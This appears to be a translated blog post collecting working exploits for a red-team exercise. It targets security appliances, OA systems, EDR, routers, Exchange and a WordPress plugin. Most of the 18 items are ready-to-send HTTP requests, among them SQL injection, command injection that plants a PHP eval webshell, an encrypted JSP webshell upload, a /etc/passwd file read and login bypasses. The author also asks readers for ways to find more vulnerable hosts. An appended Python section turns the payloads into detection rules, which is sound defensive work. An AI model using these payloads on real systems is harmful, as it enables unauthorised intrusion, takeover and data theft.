
JE2Se, a not-very-ambitious little newbie

HVV Vulnerability Collection: EXPs

1. Topsec Data Leakage Prevention system: unauthorized change of the administrator password

No login is required. The password-change function does not verify the original password, and the /?module=auth_user&action=mod_edit_pwd endpoint is accessible without authorization, so any user's password can be changed directly. The default superman account has uid 1.

POST /?module=auth_user&action=mod_edit_pwd
Cookie: username=superman;

uid=1&pd=Newpasswd&mod_pwd=1&dlp_perm=1

2. NSFOCUS UTS comprehensive threat probe: arbitrary administrator login

Modify the response packet: changing false to true leaks the MD5 password hash of the admin user.

Use the leaked MD5 value on the login page.

3. Topsec TopApp-LB load balancer SQL injection

POST /acc/clsf/report/datasource.php HTTP/1.1
Host:
Connection: close
Accept: text/javascript, text/html, application/xml, text/xml, */*
X-Prototype-Version: 1.6.0.3
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=ijqtopbcbmu8d70o5t3kmvgt57
Content-Type: application/x-www-form-urlencoded
Content-Length: 201

t=l&e=0&s=t&l=1&vid=1+union select 1,2,3,4,5,6,7,8,9,substr('a',1,1),11,12,13,14,15,16,17,18,19,20,21,22--+&gid=0&lmt=10&o=r_Speed&asc=false&p=8&lipf=&lipt=&ripf=&ript=&dscp=&proto=&lpf=&lpt=&rpf=&rpt=

4. Yonyou GRP-U8 SQL injection

POST /Proxy HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;)
Host: host
Content-Length: 357
Connection: Keep-Alive
Cache-Control: no-cache

cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">exec xp_cmdshell 'net user'</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>


5. BT Panel (宝塔) Nginx parsing vulnerability

Write a local file containing
<?php phpinfo(); ?>

Save it with a .jpg extension.
Upload the file directly, without any modification.
Visit the URL of the uploaded file:

append /.php after upload/1.jpg

6. Sangfor EDR RCE

Bypass: {"params":"w=123\"'1234123'\"|<command>"}

Result and returned output (screenshots in the original post).

7. Qizhi bastion host pre-auth remote command execution (CNVD-2019-20835)

Unauthenticated, no login required.
1. Visit http://10.20.10.11/listener/cluster_manage.php: it returns "OK".
2. Visit the link below to get a shell; on success it writes a PHP one-line webshell.
3. /var/www/shterm/resources/qrcode/lbj77.php, password 10086

https://10.20.10.10/ha_request.php?action=install&ipaddr=10.20.10.11&node_id=1${IFS}|`echo${IFS}" ZWNobyAnPD9waHAgQGV2YWwoJF9SRVFVRVNUWzEwMDg2XSk7Pz4nPj4vdmFyL3d3dy9zaHRlcm0vcmVzb3VyY2VzL3FyY29kZS9sYmo3Ny5waHAK"|base64${IFS}- d|bash`|${IFS}|echo${IFS}


8. Weaver OA E-Bridge arbitrary file read

Unauthenticated arbitrary file read:

GET /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt HTTP/1.1
User-Agent: curl/7.29.0
Host: xxxxx
Accept: */*

9. BT Panel phpMyAdmin unauthorized access

The BT Panel database panel unauthorized access (no login needed) that was all over WeChat Moments and group chats a while ago; the affected versions are the ones with the security issue (screenshot in the original post).

1. BT Panel's default phpMyAdmin port is 888, so checking for this is extremely simple: 172.10.0.121:888/pma
2. If the BT Panel version is affected, the phpMyAdmin page appears directly.

10. Exchange Server remote code execution

Microsoft's advisory makes it plain: with only an Exchange user account, arbitrary commands can be executed on the Exchange server.
https://srcincite.io/pocs/cve-2020-16875.py.txt
https://srcincite.io/pocs/cve-2020-16875.ps1.txt

researcher@incite:~$ ./poc.py
(+) usage: ./poc.py <target> <user:pass> <cmd>
(+) eg: ./poc.py 192.168.75.142 harrym@exchangedemo.com:user123### mspaint
researcher@incite:~$ ./poc.py 192.168.75.142 harrym@exchangedemo.com:user123### mspaint
(+) logged in as harrym@exchangedemo.com
(+) found the __viewstate: /wEPDwUILTg5MDAzMDFkZFAeyPS7/eBJ4lPNRNPBjm8QiWLWnirQ1vsGlSyjVxa5
(+) triggered rce as SYSTEM!

11. PhpStudy Nginx parsing vulnerability

1. The only precondition is uploading a malicious PHP file to the server (OSS doesn't count!).
<?php phpinfo();?>

2. Access the uploaded image URL as /x.txt/x.php and, bang, the PHP code is parsed.

12. Sangfor EDR backend arbitrary user login

Payload

/ui/login.php?user=username

Entering the payload above is all it takes to bypass the login.

https://127.0.0.1:9443/ui/login.php?user=username

The backend login is bypassed (screenshots in the original post).

13. Sangfor EDR remote command execution, CNVD-2020-46552

An attacker can exploit this vulnerability by crafting an HTTP request; successful exploitation allows arbitrary command execution on the target host. The China National Vulnerability Database (CNVD) recorded the vulnerability on 18 August and rated it "high risk; affected versions v3.2.16-19".

1) Construct the payload; the vulnerable file is c.php and the vulnerable parameter is host:

/tool/log/c.php?strip_slashes=system&host=id

2) Commands run with root privileges (screenshot in the original post).

14. WordPress plugin WP File Manager 0day

Visit this file:
/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php

It returns JSON.
Step one: send the following GET request

https://www.xxx.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php?cmd=mkfile&name=1.php&target=l1_Lw

Step two: POST the packet below to this address

https://www.xxx.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php

POST body:

cmd=put&target=l1_MS5waHA%3D&content=<webshell contents>

The shell is then created in this directory:

https://www.xxx.com/wp-content/plugins/wp-file-manager/lib/files/1.php

There are too few actually exploitable machines on the internet; I hope people can share better search syntax for finding this kind of host directly.

15. D-Link DIR-645 service.cgi remote command execution

POST /service.cgi HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Referer: http://192.168.0.1/
Content-Length: 17
Cookie: uid=NDRCRN78JY

EVENT=pwd%3bls%26

16. Leagsoft products: arbitrary file upload and command execution

POST /uai/download/uploadfileToPath.htm HTTP/1.1
HOST: xxxxx

-----------------------------570xxxxxxxxx6025274xxxxxxxx1
Content-Disposition: form-data; name="input_localfile"; filename="xxx.jsp"
Content-Type: image/png

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*this key is the first 16 characters of the 32-character MD5 of the connection password; the default connection password is rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>

-----------------------------570xxxxxxxxx6025274xxxxxxxx1
Content-Disposition: form-data; name="uploadpath"

../webapps/notifymsg/devreport/
-----------------------------570xxxxxxxxx6025274xxxxxxxx1--

17. Tongda OA v11.7 backend SQL injection to RCE

Add a user:

grant all privileges ON mysql.* TO 'at666'@'%' IDENTIFIED BY 'abcABC@123' WITH GRANT OPTION

That user then has all privileges on the mysql database; next, grant yourself privileges:

UPDATE `mysql`.`user` SET `Password` = '*DE0742FA79F6754E99FDB9C8D2911226A5A9051D', `Select_priv` = 'Y', `Insert_priv` = 'Y', `Update_priv` = 'Y', `Delete_priv` = 'Y', `Create_priv` = 'Y', `Drop_priv` = 'Y', `Reload_priv` = 'Y', `Shutdown_priv` = 'Y', `Process_priv` = 'Y', `File_priv` = 'Y', `Grant_priv` = 'Y', `References_priv` = 'Y', `Index_priv` = 'Y', `Alter_priv` = 'Y', `Show_db_priv` = 'Y', `Super_priv` = 'Y', `Create_tmp_table_priv` = 'Y', `Lock_tables_priv` = 'Y', `Execute_priv` = 'Y', `Repl_slave_priv` = 'Y', `Repl_client_priv` = 'Y', `Create_view_priv` = 'Y', `Show_view_priv` = 'Y', `Create_routine_priv` = 'Y', `Alter_routine_priv` = 'Y', `Create_user_priv` = 'Y', `Event_priv` = 'Y', `Trigger_priv` = 'Y', `Create_tablespace_priv` = 'Y', `ssl_type` = '', `ssl_cipher` = '', `x509_issuer` = '', `x509_subject` = '', `max_questions` = 0, `max_updates` = 0, `max_connections` = 0, `max_user_connections` = 0, `plugin` = 'mysql_native_password', `authentication_string` = '', `password_expired` = 'Y' WHERE `Host` = Cast('%' AS Binary(1)) AND `User` = Cast('at666' AS Binary(5));
Then use the injection point to flush privileges, because the user does not have the privilege to flush privileges itself:
general/hr/manage/query/delete_cascade.php?condition_cascade=flush privileges;
Now the user has all privileges. Log in again:
If it shows this, or the password simply cannot be changed, run this once more:
grant all privileges ON mysql.* TO 'at666'@'%' IDENTIFIED BY 'abcABC@123' WITH GRANT OPTION

Find the path:
select @@basedir; # c:\td0a117\mysql5\, so the web root is c:\td0a117\webroot\

Method 1:
set global slow_query_log=on; set global slow_query_log_file='C:/td0a117/webroot/tony.php'; select '<?php eval($_POST[x]);?>' or sleep(11);
Method 2:
set global general_log = on;
set global general_log_file = 'C:/td0a117/webroot/tony2.php';
select '<?php eval($_POST[x]);?>';
show variables like '%general%';

18. Weaver E-Bridge: another arbitrary file read and write vulnerability

Demo (screenshot in the original post).
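As an added defensive example that is not part of the original post, the following Python turns the request paths and parameters listed in the items above into detection rules and runs them over a few constructed proxy/WAF log lines. The log format (combined format plus an optional body="..." field), the rule names and the sample lines are assumptions for the example.

```python
import re
from urllib.parse import unquote

# Detection rules built from the request paths and parameters quoted in this post; each regex runs over the URL-decoded request path plus body.
RULES = [
    ("topsec-dlp-unauth-password-change", r"module=auth_user&action=mod_edit_pwd"),
    ("topapp-lb-sqli", r"/acc/clsf/report/datasource\.php.*union\s+select"),
    ("yonyou-grp-u8-xp_cmdshell", r"/Proxy\b.*xp_cmdshell"),
    ("qizhi-bastion-ha_request-rce", r"/ha_request\.php\?action=install.*\$\{IFS\}"),
    ("weaver-ebridge-file-read", r"/wxjsapi/saveYZJFile\?.*downloadUrl=file:"),
    ("sangfor-edr-c.php-rce", r"/tool/log/c\.php\?.*strip_slashes="),
    ("sangfor-edr-login-bypass", r"/ui/login\.php\?user="),  # GET login with user= in the query
    ("wp-file-manager-connector", r"connector\.minimal\.php.*cmd=(mkfile|put)"),
    ("dlink-service.cgi-rce", r"/service\.cgi.*EVENT=.*[;&|]"),
    ("leagsoft-jsp-upload", r"/uai/download/uploadfileToPath\.htm"),
    ("tongda-oa-delete_cascade-sqli", r"/delete_cascade\.php\?condition_cascade="),
]
COMPILED = [(name, re.compile(pat, re.I | re.S)) for name, pat in RULES]

# Combined log format plus an optional body="..." field (assumed format of a body-logging proxy/WAF).
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \d+(?: body="(.*)")?$')

def parse_line(line):
    """Fields of one log line as a dict, or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, method, path, status, body = m.groups()
    return {"ip": ip, "method": method, "path": unquote(path),
            "status": int(status), "body": unquote(body or "")}

def classify(line):
    """Names of every rule that fires on one log line (empty list if none)."""
    rec = parse_line(line)
    if rec is None:
        return []
    return [n for n, rx in COMPILED if rx.search(rec["path"] + "\n" + rec["body"])]

def scan(lines):
    """(source ip, rule name, HTTP status) for every hit in a log."""
    return [(parse_line(l)["ip"], n, parse_line(l)["status"]) for l in lines for n in classify(l)]

# Constructed sample log: three requests shaped like this post's payloads, one benign request.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Sep/2020:10:00:00 +0800] "POST /?module=auth_user&action=mod_edit_pwd HTTP/1.1" 200 512 body="uid=1&pd=Newpasswd&mod_pwd=1&dlp_perm=1"
10.0.0.6 - - [01/Sep/2020:10:00:01 +0800] "GET /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt HTTP/1.1" 200 1830
10.0.0.7 - - [01/Sep/2020:10:00:02 +0800] "GET /index.php?page=news HTTP/1.1" 200 4096
10.0.0.8 - - [01/Sep/2020:10:00:03 +0800] "POST /service.cgi HTTP/1.1" 200 88 body="EVENT=pwd%3bls%26"
"""
```

Bodies are URL-decoded before matching, so the encoded `%3b` and `%26` in the service.cgi line still trigger the shell-metacharacter check; a 200 status on a hit is worth escalating, since it suggests the endpoint answered rather than rejected the request.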
